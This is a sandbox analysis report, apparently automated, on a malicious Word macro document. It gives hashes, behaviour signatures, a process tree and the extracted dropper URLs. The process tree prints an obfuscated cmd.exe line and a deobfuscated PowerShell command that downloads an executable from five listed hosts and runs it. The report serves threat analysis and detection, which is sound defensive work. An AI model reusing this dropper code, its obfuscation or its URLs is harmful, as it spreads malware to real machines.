Analysis
-
max time kernel
112s -
max time network
136s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
-
submitted
01-05-2024 20:55
General
-
Target
0cd2dc8f5077f4bbf3b937793970fa25_JaffaCakes118.doc
-
Size
76KB
-
MD5
0cd2dc8f5077f4bbf3b937793970fa25
-
SHA1
cd23e7cf92c31d0d61b717e3aa520f696e3a031d
-
SHA256
0ee992c47ce36bb0ec5f69e73c1503daac08270193ffa3a8bfbcd9efccd903c5
-
SHA512
cca2600b1dcc91903695d49d8914581604e15c18e043dbd95a3573593cae8412aa41fdb5d7e739f0de73d1cd3e59b80e8bdc0f6f0a158bb2786199d185212586
-
SSDEEP
1536:zptJlmrJpmxlRw99NBF+a//zUmUmUlo/gGbc2+:9te2dw99fluNQc
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://bigsenindonesia.com/kYQ9UR0
exe.dropper
http://hotelnoraipro.com/iw0
exe.dropper
http://4theweb.co.uk/wwvvv/w3b
exe.dropper
http://andrewmiller.com.au/YJ7ro
exe.dropper
http://91.151.190.122/osticket/C1A9
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 6 IoCs
-
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 7 IoCs
-
Suspicious use of WriteProcessMemory 4 IoCs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\0cd2dc8f5077f4bbf3b937793970fa25_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd /V^:^O/C"s^e^t rn=^ ^ ^ ^ ^ ^ ^ }}^{^hctac}^;k^a^erb;Mp^L$ m^et^I^-ek^ovnI;)M^p^L$^ ^,WhX$(eliFd^a^olnwo^D^.qnv${yrt^{)V^W^W^$^ n^i^ ^W^h^X^$(hcaerof;'^exe^.'+^wMO$^+^'\^'^+c^i^l^b^up:vn^e^$^=^M^pL^$;^'3^9^1^' ^= w^MO$^;)'^@'(t^i^l^p^S.'^9A^1C/^tekcitso/22^1^.^0^9^1^.^151^.^19//^:pt^t^h^@^or7^J^Y/u^a^.m^oc^.rel^l^imw^er^dn^a//^:ptt^h@b^3^w/vvvww/^k^u^.^oc^.^b^ew^e^ht^4//:^p^tth^@^0w^i/^m^oc^.orpi^aronleto^h//:^p^tt^h@^0RU9^QY^k/^moc^.^ai^senodnin^esg^i^b//:pt^th'^=VWW^$;tn^e^i^lC^b^e^W^.^t^eN^ tc^e^j^b^o^-^w^en^=^qnv^$^ ^l^lehsr^ew^op&&^f^or /^L %^H ^in (37^3,^-1^,0)^d^o s^e^t ^0^3^i=!^0^3^i!!rn:~%^H,1!&&i^f %^H ^ls^s ^1 c^al^l %^0^3^i:^~-3^74%"2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell $vnq=new-object Net.WebClient;$WWV='http://bigsenindonesia.com/kYQ9UR0@http://hotelnoraipro.com/iw0@http://4theweb.co.uk/wwvvv/w3b@http://andrewmiller.com.au/YJ7ro@http://91.151.190.122/osticket/C1A9'.Split('@');$OMw = '193';$LpM=$env:public+'\'+$OMw+'.exe';foreach($XhW in $WWV){try{$vnq.DownloadFile($XhW, $LpM);Invoke-Item $LpM;break;}catch{}}3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1340 --field-trial-handle=2244,i,11878111470816612087,2265290141962607370,262144 --variations-seed-version /prefetch:81⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jpuqhb2e.kl5.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/1836-22-0x00007FFC40B80000-0x00007FFC412BF000-memory.dmpFilesize
7.2MB
-
memory/1836-39-0x00007FFC40B80000-0x00007FFC412BF000-memory.dmpFilesize
7.2MB
-
memory/1836-3-0x00007FFC02370000-0x00007FFC02380000-memory.dmpFilesize
64KB
-
memory/1836-4-0x00007FFC02370000-0x00007FFC02380000-memory.dmpFilesize
64KB
-
memory/1836-64-0x00007FFC40B80000-0x00007FFC412BF000-memory.dmpFilesize
7.2MB
-
memory/1836-6-0x00007FFC00310000-0x00007FFC00320000-memory.dmpFilesize
64KB
-
memory/1836-1-0x00007FFC02370000-0x00007FFC02380000-memory.dmpFilesize
64KB
-
memory/1836-7-0x00007FFC00310000-0x00007FFC00320000-memory.dmpFilesize
64KB
-
memory/1836-5-0x00007FFC40B80000-0x00007FFC412BF000-memory.dmpFilesize
7.2MB
-
memory/1836-2-0x00007FFC02370000-0x00007FFC02380000-memory.dmpFilesize
64KB
-
memory/1836-0-0x00007FFC02370000-0x00007FFC02380000-memory.dmpFilesize
64KB
-
memory/1836-60-0x00007FFC02370000-0x00007FFC02380000-memory.dmpFilesize
64KB
-
memory/1836-61-0x00007FFC02370000-0x00007FFC02380000-memory.dmpFilesize
64KB
-
memory/1836-63-0x00007FFC02370000-0x00007FFC02380000-memory.dmpFilesize
64KB
-
memory/1836-62-0x00007FFC02370000-0x00007FFC02380000-memory.dmpFilesize
64KB
-
memory/4140-34-0x000001894EC60000-0x000001894EC82000-memory.dmpFilesize
136KB